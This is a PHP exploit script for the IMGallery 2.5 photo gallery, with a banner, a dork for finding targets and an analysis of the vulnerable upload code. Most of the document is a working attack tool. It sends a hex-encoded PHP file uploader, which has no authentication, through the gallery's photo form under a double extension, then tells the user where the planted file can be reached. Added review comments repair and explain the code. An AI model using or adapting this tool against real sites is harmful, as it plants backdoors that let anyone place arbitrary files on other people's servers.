# Title : IMGallery <= 2.5 Create Uploader Script Exploit
# Published : 2006-12-30
# Author : Kacper
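<?php
// Target description, used only for the banner printed below.
// "<?php" instead of the short "<?" tag: the short form only works when
// short_open_tag is enabled, which is off in php.ini-production.
$exploit_name = "IMGallery <= 2.5 Create Uploader Script Exploit";
$script_name  = "IMGallery 2.5";
$script_site  = "http://www.imgallery.zor.pl/";
$dork         = '"Powered by IMGallery"';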
//**************************************************************
// Banner. A heredoc keeps the ASCII art readable; the leading and trailing
// blank lines reproduce the newline the original string started and ended with.
print <<<BANNER

::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
- - [DEVIL TEAM THE BEST POLISH TEAM] - -
[Exploit name: {$exploit_name}
[Script name: {$script_name}
[Script site: {$script_site}
dork: {$dork}
Find by: Kacper (a.k.a Rahim)
========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
========> http://www.rahim.webd.pl/ <========
Contact: kacper1964@yahoo.pl
(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon | friend str0ke ;)
Blund Coder, D0han, d3m0n, D3m0n (ziom z Niemiec :P), dn0de, DUREK5, fdj, Grzegorz, GrZyB997, konsol, Mandr4ke,
mass, michalind, mIvus, Nua, nukedclx, pepi, QunZ, Qw3rty, RebeL, SkD, Adam, arkadius, asteroid, blue, Ci2u, CrazzyIwan,
DMX, drzewko, ExTrEmE][-][ack, Gelo, Kicaj, Larry, Leito, LEON, Michas, Morpheus, MXZ, Ramzes, redsaq, TomZen
and
Dr Max Virus
TamTurk,
hackersecurity.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group members ;-)
and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

BANNER;
/*
Exploit works only when the gallery lets a logged-in user upload their own photos (the users_adm/ upload form); a valid user session id is required, this is not an unauthenticated upload :)
~~~~~~~~~~~~~
in file users_adm/start1.php:
....
$rozm = $_FILES['obraz']['size'];
if($rozm > $wielkosc_pliku) {header("Location: start.php?kategoria_form=$kategoria_form&info=101&karet=$karet&PHPSESSID=$s_id"); exit;}
//ustala typ mime pliku i tworzy odpowiedni prefix dla funkcji GD
$typ_pliku = $_FILES['obraz']['type'];
switch($typ_pliku) //<------------{1}
{
case 'image/jpeg':
$pref_gd = "jpeg";
break;
case 'image/png':
$pref_gd = "png";
break;
case 'image/pjpeg':
$pref_gd = "jpeg";
break;
}
//koniec ustala typ mime pliku i tworzy odpowiedni prefix dla funkcji GD
$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku //<------------{2}
$nazwa2 = $_FILES['obraz']['name'];//pobranie nazwy pliku z tablicy
$nazwa_zmieniona = "$nazwa1$nazwa2";//połączenie daty z nazwą pliku //<------------{3}
//zamienia polskie litery z języczkami aby nie znalazły się w nazwie fotki
$nazwa_zmieniona = strtolower($nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace(" ","_",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("ą","a",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("ę","e",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("?","z",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("?","z",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("ó","o",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("ł","l",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("?","s",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("|","s",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("?","c",$nazwa_zmieniona);
$file = "../obrazy/".$nazwa_zmieniona.""; //dodaje adres i nazwę zdjęcia do zmiennej, która jest także wykorzystywana podczas tworzenia miniatury w pliku create_min
move_uploaded_file($_FILES['obraz']['tmp_name'],"../obrazy/".$nazwa_zmieniona);//wgrywa plik na serwer //<------------{4}
chmod($file, 0755);
....
Nothing here checks the file extension: the switch at {1} has no default branch, so an unrecognised Content-Type is silently ignored rather than rejected, and the renaming at {2}-{3} only lowercases the original name and swaps a few characters. A name such as hauru.jpg.png.php therefore keeps its .php extension and move_uploaded_file() at {4} places it in the web-reachable obrazy/ directory (and chmod()s it 0755).
np. hauru.jpg.png.php <---- :)
The script only renames the file by prefixing the upload time (Date("His") = HHMMSS):
....
$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku
$nazwa2 = $_FILES['obraz']['name'];//pobranie nazwy pliku z tablicy
$nazwa_zmieniona = "$nazwa1$nazwa2";//po3㊣czenie daty z nazw㊣ pliku
....
to work out the stored name, prepend the server's HHMMSS timestamp at the moment of upload (server local time, which may differ from your own clock):
<?
$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku
$nazwa2 = "hauru.jpg.png.php";
echo "$nazwa1$nazwa2";//po3㊣czenie daty z nazw㊣ pliku
?>
the uploaded file is then reachable at:
http://site.com/IMGallery path/obrazy/(your file)
greetz ;)
*/
// The three positional arguments are mandatory; show usage and stop otherwise.
if ($argc < 4) {
    $usage = '
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path session_id OPTIONS
host: target server (ip/hostname)
path: IMGallery path
session id: you user sessionid
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 127.0.0.1 /IMGallery/ 098ab38d17e71de55c7e9993c26d3998
php '.$argv[0].' 127.0.0.1 /IMGallery/ 098ab38d17e71de55c7e9993c26d3998 -P1.1.1.1:80
-----------------------------------------------------------------------------
';
    echo $usage;
    exit;
}
// Run quietly and without PHP's own execution limit; socket reads give up
// after 5 seconds so a silent target does not hang the tool.
// NOTE(review): error_reporting(0) also hides the reason for a failed
// connection or a parse problem — raise it when debugging.
error_reporting(0);
ini_set('default_socket_timeout', '5');
ini_set('max_execution_time', '0');
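/**
 * Render a string as a simple hex dump: a hex column (two lowercase hex digits
 * per byte, space-separated, 15 bytes per row), then CRLF, then an ASCII
 * column in which every byte outside 0x21-0x7e is shown as ".".
 *
 * Not called anywhere in this script (left over from the author's template),
 * but handy for inspecting $html after sendpacket(). The listing had lost the
 * backslashes in its "\r\n" literals, which this restores.
 *
 * @param string $string raw bytes to dump
 * @return string hex rows, "\r\n", then the ASCII rows
 */
function quick_dump($string)
{
    $ascii  = '';
    $hex    = '';
    $column = 0;
    $len    = strlen($string);
    for ($i = 0; $i < $len; $i++) {
        $byte = ord($string[$i]);
        // printable range only; control chars, space and 8-bit bytes become "."
        $ascii .= ($byte <= 32 || $byte > 126) ? ' .' : ' ' . $string[$i];
        $hex   .= sprintf(' %02x', $byte);
        if (++$column == 15) {
            $column = 0;
            $ascii .= "\r\n";
            $hex   .= "\r\n";
        }
    }
    return $hex . "\r\n" . $ascii;
}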
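// Proxy spec accepted by -P: dotted-quad IPv4 followed by ":port". The listing
// had lost the backslashes ("bd{1,3}.d{1,3}…"), which matched nothing useful;
// restored here with explicit delimiters. Octet and port ranges are not checked.
$proxy_regex = '/\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}\b/';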
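/**
 * Send one raw HTTP request and leave the complete raw response in the
 * global $html.
 *
 * Connects directly to $host:$port, or to $proxy ("ip:port") when one was
 * given, writes $packet verbatim and reads until the peer closes the socket.
 * Globals read: $proxy, $host, $port, $proxy_regex. Global written: $html.
 * Exits the process (status 1) on any connection failure, as the original did.
 *
 * Fixes against the listing: the "\r\n" escapes were lost; eregi() no longer
 * exists in PHP 7+; and the proxy read loop ("!feof() or no header end seen")
 * spun forever on an early close because fread() kept returning "".
 *
 * @param string $packet complete request, headers and body, CRLF terminated
 * @return void
 */
function sendpacket($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    $errno  = 0;
    $errstr = '';
    if ($proxy == '') {
        // gethostbyname() returns the name unchanged on failure; fsockopen then reports it
        $ock = @fsockopen(gethostbyname($host), (int) $port, $errno, $errstr, 10);
        if (!$ock) {
            echo 'No response from ' . $host . ':' . $port;
            exit(1);
        }
    } else {
        if (!preg_match($proxy_regex, $proxy)) {
            echo 'Not a valid proxy...';
            exit(1);
        }
        list($proxy_ip, $proxy_port) = explode(':', $proxy, 2);
        echo "Connecting to " . $proxy_ip . ":" . $proxy_port . " proxy...\r\n";
        $ock = @fsockopen($proxy_ip, (int) $proxy_port, $errno, $errstr, 10);
        if (!$ock) {
            echo 'No response from proxy...';
            exit(1);
        }
    }
    fwrite($ock, $packet);
    // Read to EOF on both paths. An empty chunk means EOF or the
    // default_socket_timeout expired; either way there is nothing more to wait for.
    $html = '';
    while (!feof($ock)) {
        $chunk = fread($ock, 8192);
        if ($chunk === false || $chunk === '') {
            break;
        }
        $html .= $chunk;
    }
    fclose($ock);
}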
/**
 * Seed value derived from the wall clock: whole seconds plus the fractional
 * part scaled by 1e5. Left over from the author's template and not called in
 * this script. A clock-derived seed is predictable, so it must never be used
 * for anything that has to be unguessable.
 *
 * @return float
 */
function make_seed()
{
    $parts    = explode(' ', microtime());
    $fraction = (float) $parts[0];
    $seconds  = (float) $parts[1];
    return $seconds + $fraction * 100000;
}
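/**
 * Split the command line into the values the rest of the script needs.
 *
 * Positional: [1] host, [2] gallery path, [3] session id. Options after them:
 * -p<port> (default 80) and -P<ip:port> (proxy, default none). Any other word
 * is ignored, as in the original.
 *
 * @param array $args the $argv array (index 0 is the script name)
 * @return array keys host, path, sid, port (int), proxy (string)
 */
function parse_cli_args($args)
{
    $args = (array) $args;
    $opts = array(
        'host'  => isset($args[1]) ? $args[1] : '',
        'path'  => isset($args[2]) ? $args[2] : '',
        'sid'   => isset($args[3]) ? $args[3] : '',
        'port'  => 80,
        'proxy' => '',
    );
    // Options begin at index 4. The original loop started at 3, so a session
    // id that happened to begin with "-p"/"-P" was consumed as an option, and
    // it also accumulated an unused $cmd string.
    $count = count($args);
    for ($i = 4; $i < $count; $i++) {
        $word = (string) $args[$i];
        $flag = substr($word, 0, 2);
        if ($flag === '-p') {
            $opts['port'] = (int) substr($word, 2);
        } elseif ($flag === '-P') {
            $opts['proxy'] = substr($word, 2);
        }
    }
    return $opts;
}

$opts  = parse_cli_args(isset($argv) ? $argv : array());
$host  = $opts['host'];
$path  = $opts['path'];
$sid   = $opts['sid'];
$port  = $opts['port'];
$proxy = $opts['proxy'];
// Through a proxy the request line needs the absolute URL, otherwise just the path.
if ($proxy == '') {
    $p = $path;
} else {
    $p = 'http://' . $host . ':' . $port . $path;
}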
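// Payload: the file that ends up stored as <HHMMSS>hauru.jpg.png.php. Kept in
// the author's hex encoding; the listing had dropped the "\x" escapes, leaving
// a literal "x3cx3f..." string that is not the payload at all.
// Decoded, it is a small self-contained PHP page: on a POST carrying
// "upl_files" it walks up to ten "file_n[]" entries and move_uploaded_file()s
// each one to ./<original name>, printing a link per file; below that is the
// HTML form with ten file inputs. It performs no authentication whatsoever,
// so once it lands in obrazy/ anyone who finds the URL can drop arbitrary
// files next to it.
$hauru =
    "\x3c\x3f\x70\x68\x70\x20\x0d\x0a\x69\x66\x28\x69\x73\x73\x65\x74" .
    "\x28\x24\x5f\x50\x4f\x53\x54\x5b\x27\x75\x70\x6c\x5f\x66\x69\x6c" .
    "\x65\x73\x27\x5d\x29\x29\x7b\x20\x0d\x0a\x20\x20\x65\x63\x68\x6f" .
    "\x20\x27\x62\x75\x74\x74\x6f\x6e\x20\x63\x6c\x69\x63\x6b\x65\x64" .
    "\x27\x3b\x20\x0d\x0a\x20\x20\x2f\x2f\x70\x72\x69\x6e\x74\x5f\x72" .
    "\x28\x24\x5f\x46\x49\x4c\x45\x53\x5b\x27\x66\x69\x6c\x65\x5f\x6e" .
    "\x27\x5d\x29\x3b\x20\x0d\x0a\x20\x20\x65\x63\x68\x6f\x20\x27\x3c" .
    "\x68\x72\x3e\x27\x3b\x20\x0d\x0a\x20\x20\x24\x75\x70\x5f\x6d\x61" .
    "\x73\x20\x3d\x20\x24\x5f\x46\x49\x4c\x45\x53\x5b\x27\x66\x69\x6c" .
    "\x65\x5f\x6e\x27\x5d\x3b\x20\x0d\x0a\x20\x20\x24\x6d\x61\x73\x5f" .
    "\x6e\x61\x6d\x65\x20\x3d\x20\x61\x72\x72\x61\x79\x28\x29\x3b\x20" .
    "\x0d\x0a\x20\x20\x24\x6d\x61\x73\x5f\x74\x6d\x70\x20\x3d\x20\x61" .
    "\x72\x72\x61\x79\x28\x29\x3b\x20\x0d\x0a\x20\x20\x66\x6f\x72\x28" .
    "\x24\x69\x3d\x30\x3b\x20\x24\x69\x3c\x31\x30\x3b\x20\x24\x69\x2b" .
    "\x2b\x29\x7b\x20\x0d\x0a\x20\x20\x20\x20\x69\x66\x28\x21\x65\x6d" .
    "\x70\x74\x79\x28\x24\x75\x70\x5f\x6d\x61\x73\x5b\x27\x6e\x61\x6d" .
    "\x65\x27\x5d\x5b\x24\x69\x5d\x29\x29\x7b\x20\x0d\x0a\x20\x20\x20" .
    "\x20\x20\x20\x24\x6a\x20\x3d\x20\x63\x6f\x75\x6e\x74\x28\x24\x6d" .
    "\x61\x73\x5f\x6e\x61\x6d\x65\x29\x3b\x20\x0d\x0a\x20\x20\x20\x20" .
    "\x20\x20\x24\x6d\x61\x73\x5f\x6e\x61\x6d\x65\x5b\x24\x6a\x5d\x20" .
    "\x3d\x20\x24\x75\x70\x5f\x6d\x61\x73\x5b\x27\x6e\x61\x6d\x65\x27" .
    "\x5d\x5b\x24\x69\x5d\x3b\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x24" .
    "\x6d\x61\x73\x5f\x74\x6d\x70\x5b\x24\x6a\x5d\x20\x3d\x20\x24\x75" .
    "\x70\x5f\x6d\x61\x73\x5b\x27\x74\x6d\x70\x5f\x6e\x61\x6d\x65\x27" .
    "\x5d\x5b\x24\x69\x5d\x3b\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x7d" .
    "\x20\x0d\x0a\x20\x20\x20\x20\x7d\x20\x0d\x0a\x20\x20\x66\x6f\x72" .
    "\x28\x24\x69\x3d\x30\x3b\x20\x24\x69\x3c\x63\x6f\x75\x6e\x74\x28" .
    "\x24\x6d\x61\x73\x5f\x6e\x61\x6d\x65\x29\x3b\x20\x24\x69\x2b\x2b" .
    "\x29\x7b\x20\x0d\x0a\x20\x20\x20\x20\x24\x75\x70\x6c\x5f\x66\x69" .
    "\x6c\x65\x20\x3d\x20\x27\x2e\x2f\x27\x2e\x24\x6d\x61\x73\x5f\x6e" .
    "\x61\x6d\x65\x5b\x24\x69\x5d\x3b\x20\x0d\x0a\x20\x20\x20\x20\x69" .
    "\x66\x28\x6d\x6f\x76\x65\x5f\x75\x70\x6c\x6f\x61\x64\x65\x64\x5f" .
    "\x66\x69\x6c\x65\x28\x24\x6d\x61\x73\x5f\x74\x6d\x70\x5b\x24\x69" .
    "\x5d\x2c\x20\x24\x75\x70\x6c\x5f\x66\x69\x6c\x65\x29\x29\x7b\x20" .
    "\x0d\x0a\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6f\x20\x27\x3c\x61" .
    "\x20\x68\x72\x65\x66\x3d\x22\x27\x2e\x24\x6d\x61\x73\x5f\x6e\x61" .
    "\x6d\x65\x5b\x24\x69\x5d\x2e\x27\x22\x3e\x27\x2e\x24\x6d\x61\x73" .
    "\x5f\x6e\x61\x6d\x65\x5b\x24\x69\x5d\x2e\x27\x3c\x2f\x61\x3e\x3c" .
    "\x62\x72\x3e\x27\x3b\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x7d\x20" .
    "\x0d\x0a\x20\x20\x20\x20\x7d\x20\x0d\x0a\x20\x20\x7d\x20\x0d\x0a" .
    "\x3f\x3e\x20\x0d\x0a\x0d\x0a\x3c\x66\x6f\x72\x6d\x20\x65\x6e\x63" .
    "\x74\x79\x70\x65\x3d\x22\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f" .
    "\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x22\x20\x6d\x65\x74\x68\x6f" .
    "\x64\x3d\x22\x70\x6f\x73\x74\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d" .
    "\x22\x22\x3e\x20\x0d\x0a\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65" .
    "\x3d\x22\x70\x61\x64\x64\x69\x6e\x67\x3a\x20\x31\x30\x70\x78\x3b" .
    "\x20\x62\x6f\x72\x64\x65\x72\x3a\x20\x31\x70\x78\x20\x73\x6f\x6c" .
    "\x69\x64\x20\x23\x63\x63\x63\x63\x63\x63\x3b\x20\x77\x69\x64\x74" .
    "\x68\x3a\x20\x33\x30\x30\x70\x78\x3b\x22\x3e\x20\x0d\x0a\x3c\x3f" .
    "\x70\x68\x70\x20\x0d\x0a\x20\x20\x66\x6f\x72\x28\x24\x69\x3d\x30" .
    "\x3b\x20\x24\x69\x3c\x31\x30\x3b\x20\x24\x69\x2b\x2b\x29\x7b\x20" .
    "\x0d\x0a\x20\x20\x20\x20\x65\x63\x68\x6f\x20\x27\x3c\x70\x3e\x3c" .
    "\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x65" .
    "\x22\x20\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x5f\x6e\x5b\x5d" .
    "\x22\x3e\x3c\x2f\x70\x3e\x27\x3b\x20\x0d\x0a\x20\x20\x20\x20\x7d" .
    "\x20\x0d\x0a\x3f\x3e\x20\x0d\x0a\x3c\x2f\x64\x69\x76\x3e\x20\x0d" .
    "\x0a\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65\x3d\x22\x70\x61\x64" .
    "\x64\x69\x6e\x67\x3a\x20\x31\x30\x70\x78\x3b\x20\x62\x6f\x72\x64" .
    "\x65\x72\x3a\x20\x31\x70\x78\x20\x73\x6f\x6c\x69\x64\x20\x23\x63" .
    "\x63\x63\x63\x63\x63\x3b\x20\x6d\x61\x72\x67\x69\x6e\x2d\x74\x6f" .
    "\x70\x3a\x20\x31\x30\x70\x78\x3b\x20\x77\x69\x64\x74\x68\x3a\x20" .
    "\x33\x30\x30\x70\x78\x3b\x22\x3e\x20\x0d\x0a\x20\x20\x3c\x69\x6e" .
    "\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x73\x75\x62\x6d\x69\x74" .
    "\x22\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70\x6c\x5f\x66\x69\x6c\x65" .
    "\x73\x22\x20\x76\x61\x6c\x75\x65\x3d\x22\x75\x70\x6c\x6f\x61\x64" .
    "\x22\x3e\x20\x0d\x0a\x3c\x2f\x64\x69\x76\x3e\x20\x0d\x0a\x3c\x2f" .
    "\x66\x6f\x72\x6d\x3e\x20";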
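// multipart/form-data body for the gallery's photo upload. The field names
// ("urljump", "obraz", "opis", "submit") are those of its own form; "obraz" is
// the file field that reaches move_uploaded_file() in users_adm/start1.php.
// Part delimiters are "--" followed by the boundary value sent in the
// Content-Type header, part headers are separated from content by an empty
// line, and lines end in CRLF (RFC 2046). The listing had lost the blank lines
// and the CR/LF escapes and started with ".=" on an undefined variable.
$boundary = '---------------------------7d61bcd1f033e';
$part     = '--' . $boundary . "\r\n";

$data  = $part . 'Content-Disposition: form-data; name="urljump"' . "\r\n\r\n";
$data .= 'start.php?kategoria_form=2&PHPSESSID=' . $sid . "\r\n";

$data .= $part . 'Content-Disposition: form-data; name="obraz"; filename="hauru.jpg.png.php"' . "\r\n";
// text/plain matches none of the gallery's MIME cases, but its switch has no
// default branch, so the upload is not rejected on type
$data .= 'Content-Type: text/plain' . "\r\n\r\n";
$data .= $hauru . "\r\n";

$data .= $part . 'Content-Disposition: form-data; name="opis"' . "\r\n\r\n";
$data .= 'DEVIL TEAM ;-)' . "\r\n";

$data .= $part . 'Content-Disposition: form-data; name="submit"' . "\r\n\r\n";
$data .= 'Dodaj' . "\r\n";

$data .= '--' . $boundary . "--\r\n";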
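// --- Step 1: push the uploader through the gallery's own photo form ---------
// The stored name is <server HHMMSS>hauru.jpg.png.php, so the local time is
// recorded before and after the request to bracket the name to look for.
$tim1 = date('His');
echo "You date code1:\n" . $tim1 . "\n";
echo "upload Hauru!! (step 1)...\n";

// $p is the bare path, or the absolute URL when going through a proxy.
// NOTE(review): the handler quoted in the analysis above lives in start1.php
// while this posts to start.php; presumably start.php dispatches the submit.
// Check that against the target if the upload is silently ignored.
$packet  = "POST " . $p . "users_adm/start.php?kategoria_form=2&PHPSESSID=" . $sid . " HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
// both cookies in one Cookie header; the original sent two Cookie lines,
// which a server may not merge (RFC 6265 allows only one)
$packet .= "Cookie: PHPSESSID=" . $sid . "; odwiedziny=zaliczone\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacket($packet);

$tim2 = date('His');
echo "You date code2:\n" . $tim2 . "\n";
// First line of the response. The gallery answers the form with a redirect
// back to start.php on both success and failure (see the info= parameter in
// the quoted code), so a 302 on its own does not prove the upload worked.
$status = isset($html) ? strtok($html, "\r\n") : false;
echo "server replied: " . ($status === false ? '(no response)' : $status) . "\n";

sleep(1);
echo "\n";
echo "check you localisation of upload script: $tim1\n";
echo 'Find you upload script: http://' . $host . $path . 'obrazy/' . $tim2 . 'hauru.jpg.png.php';
echo "\n";
echo "or search between $tim1 and $tim2\n";
// The HHMMSS prefix comes from the *server's* clock (local time); if it is not
// in sync with this machine the real name is offset by that difference.
echo "\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";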